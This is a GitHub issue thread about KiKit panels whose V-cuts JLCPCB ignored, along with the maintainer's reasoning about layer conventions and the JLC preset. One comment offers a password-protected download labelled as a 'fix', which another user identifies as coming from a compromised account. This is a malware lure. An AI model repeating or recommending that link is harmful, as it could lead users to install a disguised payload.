yaqwsx/KiKit #728: [Danger in Delay][JLCPCB] VCuts are not processed

greenscreenflicker, 2024-08-28:
### Prerequisites

- [X] I have read [FAQ](https://yaqwsx.github.io/KiKit/latest/faq/)
- [X] I have searched existing issues (including closed ones)
- [X] I use KiKit at least version 1.6.0 (older version are not supported)

### KiKit version

kikit, version 1.6.0

### KiCAD version

8.0.4

### Operating system

Windows 11

### Description

I recently ordered panalized PCBs over JLCPCB. They came not panalized.
Gerber:
[image]
[image]

I asked JLCPCB how this could happen and their response is:
After checking, this is due to Gerber layer issue. The V cut is located in layer panel-CmtUser.gbr, which cannot be verified by our system.
Also, our engineer only proceed slot, v cut and outline based on GKO or GM1 layer.
Pls kindly check the ordering instruction on our website:
https://jlcpcb.com/help/article/14-instructions-for-ordering

### Steps to Reproduce

see above.

bkballoon, 2024-08-28:
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

greenscreenflicker, 2024-08-28:
@bkballoon your account is compromised.

yaqwsx, 2024-08-28:
JLC PCB is not "the single manufacturer we support". So, I am not willing to change the default behavior of KiKit panelization to match the non-standard and insane requirements of JLC PCB for V-cuts (they require the V-cuts to be in the Edge.Cuts layer, which breaks the 3D preview of the panel in KiCAD).

KiKit features built-in presets (https://github.com/yaqwsx/KiKit/tree/master/kikit/resources/panelizePresets); they, however, never got user attention and thus they are left abandoned. We could use a preset for JLCPCB V-cuts that would specify the V-cuts on the Edge.Cuts layer.

mikhailmihalkov, 2024-09-01:
That's why there is a gerber file editor which is not in kicad. And they are indeed right because the cut is a mechanical layer

yaqwsx, 2024-09-01:
@mikhailmihalkov  As far as I know, there is no standardized meaning for Gerber layers. Every CAD  does differently.

If I want to follow your logic, "it is a mechanical layer", I still think putting V-cuts into Edge.Cuts is wrong - the lines in the layer then have two different meanings:
- mill
- V-cut.
They should be separate layers. 

If there is an international standard for gerber layers, I am more than happy to follow it. Otherwise, I don't want to make KiKit "JLC PCB first". I find the proposed solution via built-in presets for manufacturers as the best one.

mikhailmihalkov, 2024-09-01:
There is no standard for the name, you can call it whatever you want, but it must be mechanical, the recognition system must clearly understand that it is mechanical. If you look at the picture above, there is no mechanical separation, but there must be a contour, this is how most cad work.

gcormier, 2024-09-01:
If you are doing PCBA at JLC without choosing the approval option before it goes to fab, you're living life dangerously!

Personally I use KiKit/KiBot for tons of orders and have no issues with JLC and V-Cuts. I'm now using the JLC preset but only switched over maybe 3-4 months ago to that preset.

(BTW, I have a PR https://github.com/yaqwsx/KiKit/pull/677 that would let us specify which layer to put V-Cut notes, but I couldn't get it to only add the text to 1 layer. However I don't think this is related to your issue)

greenscreenflicker, 2024-10-16:
@yaqwsx can you accept that pull request, as it would solve my problem.

greenscreenflicker, 2024-11-12:
@yaqwsx ping

yaqwsx, 2025-01-26:
I still stand by that Kikit shouldn't be "single manufacturer oriented". The proper solution is to use presets, the one for JLC PCB V-cuts was introduced in db1f37d17d52a466b55e921e330063e6d7cca74c. Simply invoke `kikit panelize -p :jlcVcuts board panel` and you get V-cuts on the `Edge.Cuts` layer. However, you have to accept that the DRC won't pass on the resulting panel and KiCAD gets confused by having non-edge lines on the `Edge.Cuts` layer.

closed 2025-01-26 by yaqwsx